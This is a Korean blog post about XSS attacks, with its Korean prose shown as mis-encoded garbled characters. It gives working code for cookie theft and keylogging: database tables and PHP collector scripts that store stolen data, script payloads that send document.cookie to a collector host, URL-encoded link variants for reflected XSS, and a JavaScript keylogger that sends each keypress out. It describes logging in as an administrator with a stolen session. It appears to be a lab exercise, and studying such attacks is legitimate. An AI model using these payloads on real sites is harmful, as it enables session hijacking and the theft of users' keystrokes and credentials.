์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

XSS ๊ณต๊ฒฉ - ์„ธ์…˜ ๊ฐ’ , ํ‚ค ๋กœ๊น…

  • -
๋ฐ˜์‘ํ˜•
# ์„ธ์…˜ ๊ฐ’ ๋ฐ›์„ ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ƒ์„ฑ
CREATE database xss_attack;
USE xss_attack;
CREATE table session_list(
	date date,
    ip varchar(15),
    session varchar(50)
    );
# ์„ธ์…˜ ๊ฐ’ ๋ฆฌ์ŠคํŠธ ์ƒ์„ฑ
<?php
    $db_conn = new mysqli("127.0.0.1","root","apmsetup","xss_attack");

    $session = $_GET["data"];
    $remote_ip = $_SERVER["REMOTE_ADDR"];

    if(!empty($session)){
        $query = "insert into session_list values(now(), '{$remote_ip}', '$session')";
        $db_conn->query($query);
    }
?>

 

์„ธ์…˜ ๋ฆฌ์ŠคํŠธ๊ฐ€ ์Œ“์ด๋Š”๊ฒƒ ํ™•์ธ

 

XSS ๊ณต๊ฒฉ ์‹œํ–‰

# ip๋ถ€๋ถ„์— ์ž์‹ ์˜ ip ์ž…๋ ฅ
<script>location.href="http://192.168.0.114/session.php?data="+document.cookie</script>

๋ฐ›์•„์˜ค๊ฒŒ๋œ ์„ธ์…˜ ๊ฐ’ ํ™•์ธ
์„ธ์…˜ ๊ฐ’ ๋ถ™์—ฌ ๋„ฃ๊ธฐ ํ›„ ์ƒˆ๋กœ๊ณ ์นจ
๊ด€๋ฆฌ์ž ์•„์ด๋””๋กœ ๋กœ๊ทธ์ธ ์™„๋ฃŒ

<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new Image().src="http://192.168.0.114/session.php?data="+document.cookie</script>>๋ฐ”๋กœ๊ฐ€๊ธฐ<a>

<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>

<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>>๋ฐ”๋กœ๊ฐ€๊ธฐ<a>

 

key Logging
๋ˆ„๋ฅด๋Š” key๋“ค์„ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค๋กœ ๋ฐ›์•„์˜จ๋‹ค

 

# keylogging
CREATE table key_logging(
	date date,
    ip varchar(15),
    data text);
# key logging ์‹คํ–‰ ๊ตฌ๋ฌธ
<?php
    $db_conn=new mysqli("127.0.0.1", "root", "apmsetup", "xss_attack");
    $key = $db_conn->real_escape_string($_GET["data"]);
    $remote_ip = $_SERVER["REMOTE_ADDR"];

    if(!empty($key)){
        $query = " SELECT * FROM key_logging where ip='{$remote_ip}'";

        $tmp = $db_conn->query($query);
        $cnt = $tmp->num_rows;

        if($cnt==0){
            $query="INSERT INTO key_logging VALUES(now(),'{$remote_ip}','{$key}')";

        }else{
            $query = "UPDATE key_logging SET data=concat(data,'{$key}') WHERE ip='{$remote_ip}'";
        }
        $db_conn->query($query);
    }
    $db_conn -> close();
?>

 

<script>document.onkeypress=function(a){
	alert(a.key); 
    key=encodeURI(a.key); 
    if(key=="Enter"){
    key="(E)";
    } 
    new Image().src="http://192.168.0.114/keylogging.php?data="+key;
    }
</script>


<script>document.onkeypress=function(a){alert(a.key); key=encodeURI(a.key); if(key=="Enter"){key="(E)";}new Image().src="http://192.168.0.114/keylogging.php?data="+key;}</script>

 

key logging ๊ฒŒ์‹œ๋ฌผ์— ๋“ค์–ด๊ฐ”์„ ๋•Œ
๋œธ
๋ˆ„๋ฅธ key data๋“ค์ด ๋‚˜์˜จ๋‹ค.

 

๋ฐ˜์‘ํ˜•
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.